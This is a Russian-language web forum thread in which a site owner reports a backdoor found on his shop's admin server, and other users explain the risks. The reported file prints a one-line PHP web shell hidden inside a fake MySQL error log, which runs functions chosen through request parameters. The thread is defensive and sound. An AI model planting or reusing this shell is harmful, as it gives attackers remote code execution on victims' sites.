Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

бэкдор


pmshirshov

Recommended Posts

Всем добрый день!
Вчера, в канун моего дня рождения при переносе данных с тестовой админки на рабочую был обнаружен файл. Ниже пересланное мне сообщение от надежного сотрудника который занимается моей админкой:
 

Добрый день, Петр.
 
Про бэкдор:
в /system/logs обнаружился файл config_error.php
со следующим содержимым:
 
2015-01-25 19:32:38 - PHP Notice:  Error: Table 'nicebike_new.asdlkj' doesn't exist<br />Error No: 1146<br />select  '<?php if(@$_COOKIE[qz]) ($_=@$_REQUEST[q]).@$_($_REQUEST[z]); ?>' from asdlkj; in /home/nicebike/new.nicebike.ru/docs/system/database/mysql.php on line 49
 
Жирным выделена собственно зловредная часть, остальное — просто фейковое сообщение об ошибке. 
Про него выгугливается вот это: https://rdot.org/forum/showthread.php?p=33614 (см последнее сообщение)
"Было бы забавно, если бы ник запостившего совпал с ником того человека которому Вы Петр предоставляли доступ ранее."

Форумчане, что вы думаете по этому поводу? Мне нужно Ваше мнение!
Если можно напишите пожалуйста человеческим языком чем это может грозить? И как в дальнейшем от этого защитится?
Надіслати
Поділитися на інших сайтах


А можно весь файл в студию?...

 

Скорее всего что да, бэкдор, позволяющий выполнять скрипт на сайте. Грозит - можно загрузить на него все что угодно, от фантазии автора зависит.

Защититься - давать доступ только добросовестным работникам, после выполнения сразу отбирать. Если есть возможность, смотреть что он сделал. Это конечно сложно, если нет соответствующих познаний.

Надіслати
Поділитися на інших сайтах


чем это может грозить?

Чем грозят шеллы и бекдоры?

Рассылкой от вас спама, DDoS-а, раздачей вирусов, удалением вашего сайта, воровством содержимого базы или её постепенной и малозаметной порчей (чтоб не сразу заметили и кинулись восстанавливать из бекапов, менять пароли и перекрывать входы и выходы).

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.